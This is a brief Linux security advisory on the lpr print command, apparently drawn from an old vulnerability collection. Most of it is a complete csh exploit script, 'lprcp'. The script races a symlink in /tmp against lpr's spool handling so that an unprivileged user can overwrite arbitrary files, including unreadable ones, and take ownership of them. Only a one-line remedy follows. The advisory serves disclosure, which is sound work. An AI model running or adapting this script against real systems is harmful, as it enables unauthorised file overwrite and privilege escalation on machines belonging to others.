COMMAND

    lpr

SYSTEMS AFFECTED

    Linux

PROBLEM

    This is an exploit script taken from an 8lmg security advisory...

    #!/bin/csh -f
    #
    # Usage: lprcp from-file to-file
    #

    if ($#argv != 2) then
        echo Usage: lprcp from-file to-file
        exit 1
    endif

    # This link stuff allows us to overwrite unreadable files,
    # should we want to.
    echo x > /tmp/.tmp.$$
    lpr -q -s /tmp/.tmp.$$
    rm -f /tmp/.tmp.$$	        # lpr's accepted it, point it
    ln -s $2 /tmp/.tmp.$$	    # to where we really want

    @ s = 0
    while ( $s != 999)          # loop 999 times
        lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
        @ s++
        if ( $s % 10 == 0 ) echo -n .
    end
    lpr $1                      # incoming file
                                # user becomes owner
    rm -f /tmp/.tmp.$$
    exit 0

SOLUTION

    Use newer version  of lpr or  install lpr wrapper  (see lpr #2  in
    linux vulnerabilities on this page)